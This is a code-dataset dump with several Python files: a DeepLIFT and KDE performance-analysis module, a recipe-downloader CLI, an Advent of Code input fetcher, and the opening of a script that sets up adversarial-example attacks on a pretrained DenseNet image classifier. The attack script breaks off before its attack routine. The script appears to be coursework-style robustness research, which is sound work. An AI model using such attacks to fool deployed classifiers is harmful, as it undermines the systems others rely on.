seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
34677552243 | import logging
import numpy as np
from ComperfModelling import predict_from_model
def run_kernel_density_estimation(values, normalised=False, normalisation_statistic=0):
values = values.reshape(-1,1)
# What should bandwidth be? Add as part of experiment configuration?
bandwidth = 100000
evaluation_gap = 50000
if normalised:
bandwidth = float(bandwidth)/normalisation_statistic
evaluation_gap = float(evaluation_gap)/normalisation_statistic
kde = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(values)
return kde, bandwidth, evaluation_gap
def compute_sample_weights_from_kde(kde, values, normalised=False, normalisation_statistic=0.0):
# It is very expensive to evaluate every single example, so bin the examples into bins of 100k cycles, and apply the same weight to all examples within a given bin
range_max = np.amax(values)
range_min = np.amin(values)
# Making the bin size equal to the bandwidth of the KDE
bin_size = 100000
if normalised:
bin_size = bin_size/normalisation_statistic
bins = int((float(range_max) - range_min)/float(bin_size))
bin_positions = np.linspace(range_min,range_max,bins) + (bin_size/2.0) # i.e. evaluate the middle of each bin
density_estimations = np.exp(kde.score_samples(bin_positions.reshape(-1,1)))
# clip density estimations for bins that very likely don't contain any examples, as otherwise sample weights explode
density_estimations[density_estimations < 0.1] = np.nan
sample_weights = np.reciprocal(density_estimations)
sample_weights[np.isnan(sample_weights)] = 10
# now, apply the correct weight to each original estimation_position
estimation_position_corresponding_bins = ((values - range_min) / bin_size).astype(np.int32)
estimation_position_corresponding_bins[estimation_position_corresponding_bins >= bins] = bins-1
per_example_sample_weights = sample_weights[estimation_position_corresponding_bins]
logging.debug("Clipped %d examples to have a maximum sample weight of 10", len(per_example_sample_weights[per_example_sample_weights == 10]))
return per_example_sample_weights
def kde_clustering_get_indexes(values, normalised=False, normalisation_statistic=0):
counts = values.reshape(-1,1)
kde, bandwidth, evaluation_gap = run_kernel_density_estimation(counts, normalised, normalisation_statistic)
num_divisions = int(np.amax(counts)-np.amin(counts))/evaluation_gap
if num_divisions < 20:
# i.e. if we evaluate the density at less than this number of divisions, then we can't possibly cluster...
return None, [], []
estimation_positions = np.linspace(np.amin(counts),np.amax(counts),num_divisions)
estimation_positions = estimation_positions.reshape(-1,1)
estimations = np.exp(kde.score_samples(estimation_positions))
# form a minimum by starting at 1.0 then descending to 0.0, then continuing with the histogram
estimations = np.insert(estimations,0,0.0,axis=0)
estimation_positions = np.insert(estimation_positions,0,np.amin(counts)-evaluation_gap,axis=0)
estimations = np.insert(estimations,0,1.0,axis=0)
estimation_positions = np.insert(estimation_positions,0,np.amin(counts)-(2*evaluation_gap),axis=0)
mi, ma = argrelextrema(estimations, np.less_equal)[0], argrelextrema(estimations, np.greater)[0]
bounds = []
populated_cluster_id = 0
cluster_indexes = []
cluster_bounds = []
for idx in np.arange(1,len(mi)):
lower_bound = estimation_positions[mi[idx-1]]
if idx == (len(mi)-1):
upper_bound = np.amax(counts)+1
else:
upper_bound = estimation_positions[mi[idx]]
clustered_task_indexes = np.where(np.logical_and(counts >= lower_bound, counts < upper_bound))[0]
if(len(clustered_task_indexes) > 0):
cluster_indexes.append(clustered_task_indexes)
cluster_bounds.append([lower_bound,upper_bound])
return kde, cluster_indexes, cluster_bounds
"""
This function aims to identify significant differences between the responses, and saving the examples to later investigate as a comparative study
A comparison may be between individual tasks or two task sets, where we necessarily average the latter
"""
def get_comparisons(responses):
# should also save the cluster details so we can later use them to repeat the equivalent analysis on separate testing sets
individual_comparisons = []
cluster_comparisons = []
cluster_comparison_bounds = []
central_cluster_indexes = []
central_cluster_bounds = []
individual_comparisons = []
cluster_comparisons = []
kde = None
# return a list of pairs, where each element is a list of task indexes to compare against eachother
# return two types of comparisons: closest-to-mean task, tasks within 1*std-deviation of mean
kde, clustered_task_indexes, cluster_bounds = kde_clustering_get_indexes(responses)
if kde is None:
log.info("Could not cluster instances as there is no significant variation.")
return central_cluster_indexes, central_cluster_bounds, individual_comparisons, cluster_comparisons, kde
# filter to only the significant clusters?
large_clusters = []
minimum_cluster_size = max([int(0.01*len(responses)),10])
for cluster_idx, cluster_indexes in enumerate(clustered_task_indexes):
if len(cluster_indexes) >= minimum_cluster_size:
large_clusters.append(cluster_idx)
logging.info("Found %d significant clusters (minimum cluster size was: %d)", len(large_clusters), minimum_cluster_size)
clustered_task_indexes = [cluster_indexes for cluster_idx, cluster_indexes in enumerate(clustered_task_indexes) if cluster_idx in large_clusters]
cluster_bounds = [cluster_indexes for cluster_idx, cluster_indexes in enumerate(cluster_bounds) if cluster_idx in large_clusters]
if len(clustered_task_indexes) < 2:
logging.info("There were fewer than two clusters, so cannot do a comparative analysis")
return central_cluster_indexes, central_cluster_bounds, individual_comparisons, cluster_comparisons, kde
fast_cluster = clustered_task_indexes[0]
slow_clusters = clustered_task_indexes[1:]
fast_durations = responses[fast_cluster]
mean_fast_task_idx = (np.abs(fast_durations - np.mean(fast_durations))).argmin()
mean_fast_task_idx_original_set = fast_cluster[mean_fast_task_idx]
constraint_coefficient = 0.5
fast_lower_central_bound = np.mean(fast_durations) - constraint_coefficient * np.std(fast_durations)
fast_upper_central_bound = np.mean(fast_durations) + constraint_coefficient * np.std(fast_durations)
central_fast_task_idxs = np.where(np.logical_and(fast_durations>=fast_lower_central_bound, fast_durations<=fast_upper_central_bound))[0]
fast_durations_within_constraint = fast_durations[central_fast_task_idxs].flatten()
distances_from_mean = np.absolute(fast_durations_within_constraint - np.mean(fast_durations))
distances_sorted_indexes = np.argsort(distances_from_mean)
# now filter the central indexes to only those that are within the bounds and are the closest to mean
central_fast_task_idxs = central_fast_task_idxs[distances_sorted_indexes[:50]]
# update the bounds
fast_lower_central_bound = np.amin(fast_durations[central_fast_task_idxs])
fast_upper_central_bound = np.amax(fast_durations[central_fast_task_idxs])
central_fast_task_idxs_original_set = fast_cluster[central_fast_task_idxs]
central_cluster_bounds = []
central_cluster_bounds.append([fast_lower_central_bound, fast_upper_central_bound])
central_cluster_indexes = []
central_cluster_indexes.append(central_fast_task_idxs_original_set)
for slow_cluster_idx, slow_cluster in enumerate(slow_clusters):
slow_durations = responses[slow_cluster]
mean_slow_task_idx = (np.abs(slow_durations - np.mean(slow_durations))).argmin()
mean_slow_task_idx_original_set = slow_cluster[mean_slow_task_idx]
lower_central_bound = np.mean(slow_durations) - constraint_coefficient * np.std(slow_durations)
upper_central_bound = np.mean(slow_durations) + constraint_coefficient * np.std(slow_durations)
central_slow_task_idxs = np.where(np.logical_and(slow_durations>=lower_central_bound, slow_durations<=upper_central_bound))[0]
central_slow_task_idxs_original_set = slow_cluster[central_slow_task_idxs]
slow_durations_within_constraint = slow_durations[central_slow_task_idxs].flatten()
slow_distances_from_mean = np.absolute(slow_durations_within_constraint - np.mean(slow_durations))
slow_distances_sorted_indexes = np.argsort(slow_distances_from_mean)
# now filter the central indexes to only those that are within the bounds and are the closest to mean
central_slow_task_idxs = central_slow_task_idxs[slow_distances_sorted_indexes[:50]]
central_slow_task_idxs_original_set = slow_cluster[central_slow_task_idxs]
# update the bounds
lower_central_bound = np.amin(slow_durations[central_slow_task_idxs])
upper_central_bound = np.amax(slow_durations[central_slow_task_idxs])
individual_comparisons.append([mean_fast_task_idx_original_set, mean_slow_task_idx_original_set])
central_cluster_bounds.append([lower_central_bound, upper_central_bound])
central_cluster_indexes.append(central_slow_task_idxs_original_set)
cluster_comparisons.append([0,slow_cluster_idx+1])
return central_cluster_indexes, central_cluster_bounds, individual_comparisons, cluster_comparisons, kde
def run_pca_transformation(taskset, pca):
taskset = list(taskset)
taskset[1] = np.array([sum((taskset[1][i]*np.array(pca.components_[:])).transpose()) for i in range(len(taskset[1]))])
taskset = tuple(taskset)
def run_sample_weighting_and_pca_transformation(
training_taskset,
validation_taskset,
testing_taskset,
should_standardise,
pca_transform,
training_event_stats):
training_responses = training_taskset[2]
validation_responses = validation_taskset[2]
testing_responses = testing_taskset[2]
kde_params = {}
kde_params["normalised"] = should_standardise
kde_params["normalisation_statistic"] = training_event_stats[-1][1]
kde_params["values"] = training_responses
kde, _, _ = run_kernel_density_estimation(**kde_params)
kde_params["kde"] = kde
training_sample_weights = compute_sample_weights_from_kde(**kde_params)
kde_params["values"] = validation_responses
validation_sample_weights = compute_sample_weights_from_kde(**kde_params)
kde_params["values"] = testing_responses
testing_sample_weights = compute_sample_weights_from_kde(**kde_params)
num_input_events = len(training_taskset[1][0])
if pca_transform == True:
from sklearn.decomposition import PCA
pca = PCA(n_components=num_input_events)
pca.fit_transform(training_taskset[1])
else:
pca = pca_struct()
pca.components_ = np.identity(num_input_events)
run_pca_transformation(training_taskset, pca)
run_pca_transformation(validation_taskset, pca)
run_pca_transformation(testing_taskset, pca)
return training_taskset, validation_taskset, testing_taskset, training_sample_weights, validation_sample_weights, testing_sample_weights, pca
def calculate_mae(models, testing_taskset):
testing_examples = testing_taskset[1]
testing_responses_true = testing_taskset[2][:,0]
maes = []
for model in models:
testing_responses_pred = predict_from_model(model.model_file, testing_examples)
mae = np.sum(np.absolute(testing_responses_pred - testing_responses_true)) / float(len(testing_responses_true))
maes.append(mae)
mean_mae = np.mean(maes)
return mean_mae
def get_analysis_tasksets_for_configuration(
dataset,
all_events,
pca_component_struct,
taskset_kwargs
):
# Which configuration to get from the dataset is within the "benchmark_id" kwarg
taskset, _, _ = dataset.get_taskset(**taskset_kwargs)
run_pca_transformation(taskset, pca_component_struct)
taskset_fs, _, _ = dataset.get_taskset(**taskset_kwargs) # No pca transformation here
taskset_kwargs["input_events"] = all_events
taskset_kwargs["standardised"] = False
taskset_all_events_fs_destandardised, _, _ = dataset.get_taskset(**taskset_kwargs) # No pca transformation here
return taskset, taskset_fs, taskset_all_events_fs_destandardised
def analyse_tasks_across_benchmarks(self,
models,
testing_tasksets, # array of length two, for two sets of tasks to compare to eachother
scores,
predicted_responses,
std_devs,
reference_responses,
true_responses,
reference_benchmark_idx, # i.e. what index of testing_tasksets is the reference
reference_strategy="minimum_predicted_response",
reference_indexes=[],
just_get_values=False # If True, then deeplift won't be invoked at all, and all produced contributions/coefficients will be 0
):
target_benchmark_idx = [benchmark_idx for benchmark_idx in range(len(testing_tasksets)) if benchmark_idx != reference_benchmark_idx][0]
if just_get_values:
models = [0] # We don't need the models if we just want to get the value variations, but we do need an element in the list
else:
backend.set_floatx('float32')
backend.set_learning_phase(False) # this is some keras funkery when using models with backend: https://github.com/fchollet/keras/issues/2310
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
backend.set_session(tf.Session(config=config))
reference_example_idx = -1
for model in models:
if just_get_values:
reference_example = np.zeros(len(testing_tasksets[reference_benchmark_idx][1][0])).tolist()
reference_response = 0.0
deeplift_results = np.array([[0.0 for event in reference_example] for task in testing_tasksets[target_benchmark_idx][1]])
model_reference_predictions = np.array([0.0 for task in testing_tasksets[target_benchmark_idx][1]])
model_target_predictions = np.array([0.0 for task in testing_tasksets[target_benchmark_idx][1]])
if reference_responses == None:
reference_responses = [reference_response]
else:
reference_responses.append(reference_response)
reference_example_idx = 0
reference_indexes.append(reference_example_idx)
else:
model_reference_predictions = predict_from_model(model.model_file, testing_tasksets[reference_benchmark_idx][1])
model_target_predictions = predict_from_model(model.model_file, testing_tasksets[target_benchmark_idx][1])
# If the comparison is between two groups of examples, which ones do we compare?
# After this switch, we will have one reference example and one target example
if reference_strategy == "minimum_predicted_response":
reference_example_idx = np.argmin(model_reference_predictions)
reference_example = testing_tasksets[reference_benchmark_idx][1][reference_example_idx]
reference_response = model_reference_predictions[reference_example_idx]
elif reference_strategy == "closest_to_mean_predicted_response":
difference_from_mean = 9999999
reference_example_idx = 0
mean = np.mean(model_reference_predictions)
for task_idx, duration in enumerate(model_reference_predictions):
if abs(mean - duration) < difference_from_mean:
difference_from_mean = abs(mean - duration)
reference_example_idx = task_idx
reference_example = testing_tasksets[reference_benchmark_idx][1][reference_example_idx]
reference_response = model_reference_predictions[reference_example_idx]
elif reference_strategy == "minimum_true_response":
reference_example_idx = np.argmin(testing_tasksets[reference_benchmark_idx][2])
reference_example = testing_tasksets[reference_benchmark_idx][1][reference_example_idx]
reference_response = keras_model.predict(np.array([reference_example]))[:,0]
elif reference_strategy == "minimum_example_inputs":
reference_example = [np.amin(event_counts) for event_idx, event_counts in enumerate(testing_tasksets[reference_benchmark_idx][1].transpose())]
reference_response = keras_model.predict(np.array([reference_example]))[:,0]
elif reference_strategy == "zeros":
reference_example = np.zeros(len(testing_tasksets[reference_benchmark_idx][1][0])).tolist()
reference_response = keras_model.predict(np.array([reference_example]))[:,0]
else:
logging.error("Invalid reference strategy '%s'", reference_strategy)
raise ValueError()
if reference_responses == None:
reference_responses = [reference_response]
else:
reference_responses.append(reference_response)
del model_reference_predictions
reference_indexes.append(reference_example_idx)
target_example = testing_tasksets[target_benchmark_idx][1][0]
# Now apply deeplift
deeplift_results = run_deeplift_comparison(model.model_file,
target_example,
reference_example)
# deeplift results is of format [task_idx][event_idx] = score
# Aim to return a scores format of: [label_rank][input_event_idx] = list of scores, one per model
if scores is None:
# a list of scores for every task label and event
scores = [[[] for event_idx in range(len(reference_example))] for i in list(range(int(np.amax(testing_tasksets[target_benchmark_idx][3]))))]
# a list of predicted responses for every task label
predicted_responses = [[] for i in list(range(int(np.amax(testing_tasksets[target_benchmark_idx][3]))))]
# a list of input values for every task label and event
std_devs = [[[] for event_idx in range(len(reference_example))] for i in list(range(int(np.amax(testing_tasksets[target_benchmark_idx][3]))))]
add_true_responses = False
if true_responses is None:
add_true_responses = True
true_responses = [[] for i in list(range(int(np.amax(testing_tasksets[target_benchmark_idx][3]))))]
for task_idx, rank in enumerate(testing_tasksets[target_benchmark_idx][3]): # the true number of analysed tasks (we have scores for all)
label_rank = int(rank)
if label_rank >= len(scores):
difference = (len(scores) - label_rank) + 1
for i in range(difference + 1):
scores.append([[] for event_idx in range(len(reference_example))])
predicted_responses.append([])
std_devs.append([[] for event_idx in range(len(reference_example))])
if add_true_responses:
true_responses.append([])
for event_idx, score in enumerate(deeplift_results[task_idx]):
scores[label_rank][event_idx].append(score)
std_devs[label_rank][event_idx].append(testing_tasksets[target_benchmark_idx][1][task_idx][event_idx])
predicted_responses[label_rank].append(model_target_predictions[task_idx])
if add_true_responses:
true_responses[label_rank].append(testing_tasksets[target_benchmark_idx][2][task_idx])
return scores, predicted_responses, std_devs, reference_responses, true_responses
def get_delta_values(
tasksets,
reference_benchmark_idx,
reference_index):
target_benchmark_idx = [benchmark_idx for benchmark_idx in range(len(tasksets)) if benchmark_idx != reference_benchmark_idx][0]
reference_example = tasksets[reference_benchmark_idx][1][reference_index]
values = [[[] for event_idx in range(len(reference_example))] for i in list(range(int(np.amax(tasksets[target_benchmark_idx][3]))))]
for task_idx, rank in enumerate(tasksets[target_benchmark_idx][3]):
label_rank = int(rank)
if label_rank >= len(values):
difference = (len(values) - label_rank) + 1
for i in range(difference + 1):
values.append([[] for event_idx in range(len(reference_example))])
for event_idx in range(len(tasksets[target_benchmark_idx][1][task_idx])):
values[label_rank][event_idx].append(tasksets[target_benchmark_idx][1][task_idx][event_idx] - reference_example[event_idx])
return values
def performance_comparison(
reference_taskset,
reference_taskset_fs,
reference_taskset_all_events_fs_destandardised,
target_taskset,
target_taskset_fs,
target_taskset_all_events_fs_destandardised,
models,
training_event_stats,
training_pca_matrix,
linreg_coefficients_fs_des
):
# The performance comparison may operate as a 1-1 comparison, or a many-many comparison
# For the latter case, we average across multiple individual comparisons (all-all)
linreg_contributions_across_comparisons = []
contributions_across_comparisons = []
coefficients_across_comparisons = []
event_variations_across_comparisons = []
all_event_variations_across_comparisons = []
pred_duration_variations_across_comparisons = []
true_duration_variations_across_comparisons = []
logging.debug("For the performance comparison, there are %d reference examples and %d target examples.", len(reference_taskset[1]))
reference_instance_indexes_to_use_for_comparison = list(range(len(reference_taskset[1])))[:]
# At the moment, all reference instances are compared to all target instances
"""
num_reference_instances_to_use = 4 # TODO parameterise this arbitrary number!
if len(reference_instance_indexes_to_use_for_comparison) > num_reference_instances_to_use:
selection = np.random.choice(np.arange(len(reference_instance_indexes_to_use_for_comparison)),num_reference_instances_to_use,replace=False)
reference_instance_indexes_to_use_for_comparison = np.array(reference_instance_indexes_to_use_for_comparison)[selection].tolist()
"""
# For each reference example, compare it with the corresponding target example
for reference_instance_idx in reference_instance_indexes_to_use_for_comparison:
# Build a pseudo taskset containing the one reference example that we are comparing
reference_taskset_temp = (reference_taskset[0], reference_taskset[1][[reference_instance_idx]],reference_taskset[2][[reference_instance_idx]],reference_taskset[3][[reference_instance_idx]])
# Build a pseudo taskset containing the one target example that we are comparing
target_instance_idx = np.where(target_taskset[3] == reference_taskset_temp[3][0])[0] # i.e. find the matching label
target_taskset_temp = (target_taskset[0], target_taskset[1][[target_instance_idx]],target_taskset[2][[target_instance_idx]],target_taskset[3][[target_instance_idx]])
# reference and target tasksets in FS
reference_instance_idx_fs = np.where(reference_taskset_fs[3] == reference_taskset_temp[3][0])[0]
target_instance_idx_fs = np.where(target_taskset_fs[3] == reference_taskset_temp[3][0])[0]
reference_instance_idx_fs_all_events = np.where(reference_taskset_all_events_fs_destandardised[3] == reference_taskset_temp[3][0])[0]
target_instance_idx_fs_all_events = np.where(target_taskset_all_events_fs_destandardised[3] == reference_taskset_temp[3][0])[0]
target_taskset_fs_temp = (target_taskset_fs[0], target_taskset_fs[1][[target_instance_idx_fs]],target_taskset_fs[2][[target_instance_idx_fs]],target_taskset_fs[3][[target_instance_idx_fs]])
reference_taskset_fs_temp = (reference_taskset_fs[0], reference_taskset_fs[1][[reference_instance_idx_fs]],reference_taskset_fs[2][[reference_instance_idx_fs]],reference_taskset_fs[3][[reference_instance_idx_fs]])
comparison_tasksets = [reference_taskset_temp,target_taskset_temp]
comparison_tasksets_fs = [reference_taskset_fs_temp,target_taskset_fs_temp]
reference_indexes = []
task_scores = None
task_std_devs = None
predicted_durations = None
true_durations = None
reference_response = None
# TODO this function (and thus the surrounding code) is in need of significant refactoring!
scores, predicted_durations_tmp, task_std_devs_tmp, reference_responses_tmp, true_durations_tmp = analyse_tasks_across_benchmarks(models,
comparison_tasksets,
task_scores,
predicted_durations,
task_std_devs,
reference_response,
true_durations,
reference_benchmark_idx=0,
reference_strategy="closest_to_mean_predicted_response",
reference_indexes=reference_indexes)
event_variations_fs = get_delta_values(comparison_tasksets_fs,
reference_benchmark_idx=0,
reference_index=reference_indexes[0])
reference_example = reference_taskset_temp[1][reference_indexes[0]]
reference_duration_true = reference_taskset_temp[2][reference_indexes[0]]
reference_duration_pred = reference_responses_tmp[0]
reference_example_all_events = reference_taskset_all_events_fs_destandardised[1][reference_instance_idx_fs_all_events]
target_example_all_events = target_taskset_all_events_fs_destandardised[1][target_instance_idx_fs_all_events]
duration_variation_true = np.array([np.mean(the_durations) for task_idx, the_durations in enumerate(true_durations_tmp) if len(the_durations) > 0]) - reference_duration_true
duration_variation_destandardised_true = (duration_variation_true * training_event_stats[-1][1])
duration_variation_pred = np.array([np.mean(the_durations) for task_idx, the_durations in enumerate(predicted_durations_tmp) if len(the_durations) > 0]) - reference_duration_pred
duration_variation_destandardised_pred = (duration_variation_pred * training_event_stats[-1][1])
event_variations_fs = np.array([np.mean(delta_values,axis=1) for task_idx, delta_values in enumerate(event_variations_fs) if any(len(s) > 0 for s in delta_values)])
event_variations_fs_destandardized = event_variations_fs * np.array(training_event_stats).transpose()[1].transpose()[:-1]
event_variations = np.array([np.mean(the_inputs,axis=1) for task_idx, the_inputs in enumerate(task_std_devs_tmp) if any(len(s) > 0 for s in the_inputs)]) - reference_example
all_event_variations = np.array([target_value - reference_value for reference_value,target_value in zip(reference_example_all_events,target_example_all_events)])
scores_pc = np.array([np.mean(the_scores,axis=1) for task_idx, the_scores in enumerate(scores) if any(len(s) > 0 for s in the_scores)])
coefficients_pc = np.divide(scores_pc, event_variations, out=np.zeros_like(scores_pc), where=event_variations!=0)
coefficients_fs = np.matmul(coefficients_pc, training_pca_matrix.components_)
coefficients_fs_destandardized = ((coefficients_fs * np.array(training_event_stats)[-1][1])) / np.array(training_event_stats).transpose()[1].transpose()[:-1]
scores_fs = coefficients_fs * event_variations_fs
scores_fs_destandardized = scores_fs * training_event_stats[-1][1]
# Get the average over the compared examples (though there should only be one comparison here)
average_scores = scores_fs_destandardized[0]
average_coefficients = coefficients_fs_destandardized[0]
average_values = event_variations_fs_destandardized[0]
linreg_contributions = np.array(average_values) * linreg_coefficients_fs_des
linreg_contributions_across_comparisons.append(linreg_contributions)
if configuration_idx == reference_benchmark_id:
# Record the actual reference values so we can later reconstruct absolute counts from deltas if we want
average_values = np.matmul(reference_example, training_pca_matrix.components_) * np.array(training_event_stats).transpose()[1].transpose()[:-1] + np.array(training_event_stats).transpose()[0][:-1]
predicted_durations_destandardised = reference_duration_pred * np.array(training_event_stats[-1][1]) + training_event_stats[-1][0]
duration_variation_destandardised_pred = predicted_durations_destandardised
durations_destandardised = reference_duration_true * np.array(training_event_stats[-1][1]) + training_event_stats[-1][0]
duration_variation_destandardised_true = durations_destandardised
all_event_variations_across_comparisons.append(all_event_variations)
contributions_across_comparisons.append(average_scores)
coefficients_across_comparisons.append(average_coefficients)
event_variations_across_comparisons.append(average_values)
pred_duration_variations_across_comparisons.append(np.mean(duration_variation_destandardised_pred))
true_duration_variations_across_comparisons.append(np.mean(duration_variation_destandardised_true))
# And I need to get value variations for *all* events
average_all_event_variations = np.mean(np.array(all_event_variations_across_comparisons),axis=0)[0]
# Now I have the computed data for all the comparisons between the reference set and target set
average_linreg_contributions = np.mean(np.array(linreg_contributions_across_comparisons),axis=1)
average_contributions = np.mean(np.array(contributions_across_comparisons),axis=0)
average_coefficients = np.mean(np.array(coefficients_across_comparisons),axis=0)
average_event_variations = np.mean(np.array(event_variations_across_comparisons),axis=0)
average_predicted_duration_variations = np.mean(np.array(pred_duration_variations_across_comparisons),axis=0)
average_true_duration_variations = np.mean(np.array(true_duration_variations_across_comparisons),axis=0)
return average_contributions, average_linreg_contributions, average_coefficients, average_event_variations, average_all_event_variations, np.mean(average_predicted_duration_variations), np.mean(average_true_duration_variations)
| Richard549/ComPerf | src/ComperfAnalysis.py | ComperfAnalysis.py | py | 28,464 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.amax",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.amin",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 3... |
15031346901 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os
sys.path.append(os.path.dirname(__file__))
import argparse
from CustomPrint import custom_print_init, print_info, print_debug, print_error, print_warning
from Scrapers import url2recipe_json
from RecipeOutput import recipe_output
from CustomExceptions import UrlError
__version__ = '0.3.1'
__author__ = u'Rodney Shupe'
def parse_arguments(print_usage = False, detail = False):
""" Creates a new argument parser. """
parser = argparse.ArgumentParser('recipe-dl')
version = '%(prog)s v' + __version__
parser.add_argument(
'--version',
action='version',
version=version
)
parser.add_argument(
'-a',
'--authorize',
action="store_true",
dest="authorize_ci",
default=False,
help='Force authorization of Cook Illustrated sites',
)
parser.add_argument(
"-d",
"--debug",
action="store_true",
dest="debug",
default=False,
help="Add additional Output",
)
parser.add_argument(
"-q",
"--quiet",
action="store_true",
dest="quiet",
default=None,
#help="Suppress most output aka Silent Mode.",
help=argparse.SUPPRESS
)
parser.add_argument(
"-v",
"--verbose",
action="store_true",
dest="verbose",
default=False,
help="Make output verbose",
)
parser.add_argument(
"-j",
"--output-json",
action="store_true",
dest="output_json",
default=False,
help="Output results in JSON format.",
)
parser.add_argument(
"-m",
"--output-md",
action="store_true",
dest="output_md",
default=False,
help="Output results in Markdown format.",
)
parser.add_argument(
"-r",
"--output-rst",
action="store_true",
dest="output_rst",
default=False,
help="Output results in reStructuredText format.",
)
parser.add_argument(
'-i',
'--infile',
action="store",
dest="infile",
help="Specify input json file infile.",
)
parser.add_argument(
'-o',
'--outfile',
action="store",
dest="outfile",
help="Specify output file outfile.",
)
parser.add_argument(
"-s",
"--save-to-file",
action="store_true",
dest="save_to_file",
default=False,
help="Save output file(s).",
)
parser.add_argument(
"-f",
"--force-recipe-scraper",
action="store_true",
dest="force_recipe_scraper",
default=False,
help="For the use of the recipe scraper where applicable.",
)
parser.add_argument(
"--quick-tests",
action="store_true",
dest="quick_tests",
help=argparse.SUPPRESS,
default=False
)
parser.add_argument('URL', nargs='*', action="append", default=[],)
if print_usage:
if detail:
parser.print_help()
else:
parser.print_usage()
else:
args = parser.parse_args()
if args.quiet is None:
args.quiet = not args.verbose
if args.debug and args.quiet:
args.quiet = False
print_warning ("Debug option selected. Can not run in \"Silent Mode\"")
custom_print_init (quiet=args.quiet, debug=args.debug)
filetype_count = 0
if args.output_json:
filetype_count += 1
if args.output_md:
filetype_count += 1
if args.output_rst:
filetype_count += 1
print_debug("filetype_count=%s" % filetype_count)
if filetype_count == 0:
args.output_rst = True
elif filetype_count > 1:
print_warning ("More than one output file type select. Assuming 'Save to File'")
args.save_to_file = True
if not args.save_to_file and not args.outfile is None and args.outfile != '':
args.save_to_file = True
return args
def quick_tests(args):
""" some quick tests """
from UtilityFunctions import url2domain
url2domain("https://www.finecooking.com/recipe/herbed-grill-roasted-lamb")
tests=[
'http://www.foodandwine.com/recipes/herbed-roast-leg-of-lamb',
'https://www.bonappetit.com/recipe/instant-pot-glazed-and-grilled-ribs',
'https://www.saveur.com/perfect-brown-rice-recipe/',
'https://www.thechunkychef.com/easy-slow-cooker-mongolian-beef-recipe'
]
for test_url in tests:
custom_print_init (quiet=args.quiet, debug=args.debug)
print_info ("==========================")
recipe_output(args, url2recipe_json(args, test_url))
print_info ("==========================")
def main(args=None):
if args is None:
args = parse_arguments()
print_debug (args)
if args.quick_tests:
quick_tests(args)
else:
if not args.URL == [[]]:
for url in args.URL[0]:
try:
recipe_json = url2recipe_json(args, url)
except UrlError as err:
print_error ("Specified URL Not suported!")
sys.exit (os.EX_SOFTWARE)
except Exception as err:
print_error (err.args[1]) # arguments stored in .args
sys.exit (os.EX_TEMPFAIL)
recipe_output(args, recipe_json)
else:
if not args.infile is None and args.infile != "":
print_info ("Processsing %s..." % args.infile)
with open(args.infile) as json_file:
recipe_json = json.load(json_file)
recipe_output(args, recipe_json)
else:
print_error ("You must specify an input URL or input JSON file.")
parse_arguments(print_usage=True)
sys.exit (os.EX_USAGE)
if __name__ == '__main__':
args = parse_arguments()
main(args)
#quick_tests()
| rodneyshupe/recipe-dl | recipe_dl/main.py | main.py | py | 6,146 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
6535858908 | import os
import requests
SESSION_ID = os.getenv("aoc_session_id")
def get_data(day=1):
headers = {"cookie":f"session={SESSION_ID}"}
days_data = requests.get(f"https://adventofcode.com/2022/day/{day}/input", headers=headers)
if not os.path.exists(f"advent_of_code\day_{day}"):
os.makedirs(f"advent_of_code\day_{day}")
with open(f"advent_of_code\day_{day}\data.txt", mode="w") as data_file:
data_file.write(days_data.text)
if __name__ == "__main__":
for i in range(1, 4):
get_data(i) | OliverWBurke/advent_of_code_2022 | advent_of_code/utils.py | utils.py | py | 533 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.getenv",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,... |
17251067645 | import os
import pandas as pd
from PIL import Image
import numpy as np
import torch
import torch.nn.functional as F
import torchvision.datasets as datasets
from torch.utils.data import Dataset, DataLoader
import torchvision.models as models
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
import cv2
import copy
import sys
import time
device = torch.device("cuda")
# 實作一個繼承 torch.utils.data.Dataset 的 Class 來讀取圖片
class Adverdataset(Dataset):
def __init__(self, root, label, transforms):
# 圖片所在的資料夾
self.root = root
# 由 main function 傳入的 label
self.label = torch.from_numpy(label).long()
# 由 Attacker 傳入的 transforms 將輸入的圖片轉換成符合預訓練模型的形式
self.transforms = transforms
# 圖片檔案名稱的 list
self.fnames = []
for i in range(200):
self.fnames.append("{:03d}".format(i))
def __getitem__(self, idx):
# 利用路徑讀取圖片
img = Image.open(os.path.join(self.root, self.fnames[idx] + '.png'))
# 將輸入的圖片轉換成符合預訓練模型的形式
img = self.transforms(img)
# 圖片相對應的 label
label = self.label[idx]
return img, label
def __len__(self):
# 由於已知這次的資料總共有 200 張圖片 所以回傳 200
return 200
class Best_Attacker:
def __init__(self, img_dir, label):
self.model = models.densenet121(pretrained = True)
self.model.cuda()
self.model.eval()
self.iters = 10
self.alpha = 2/255
self.mean = [0.485, 0.456, 0.406]
self.std = [0.229, 0.224, 0.225]
# 把圖片 normalize 到 0~1 之間 mean 0 variance 1
self.normalize = transforms.Normalize(self.mean, self.std, inplace=False)
transform = transforms.Compose([
transforms.Resize((224, 224), interpolation=3),
transforms.ToTensor(),
self.normalize
])
# 利用 Adverdataset 這個 class 讀取資料
self.dataset = Adverdataset(img_dir, label, transform)
self.loader = torch.utils.data.DataLoader(
self.dataset,
batch_size = 1,
shuffle = False)
def L_infinity(self, origin, new, epsilon):
difference = origin - new
max_diff = torch.max(torch.abs(difference))
return max_diff
def attack(self, epsilon):
# 存下一些成功攻擊後的圖片 以便之後顯示
adv_examples = []
wrong, fail, success = 0, 0, 0
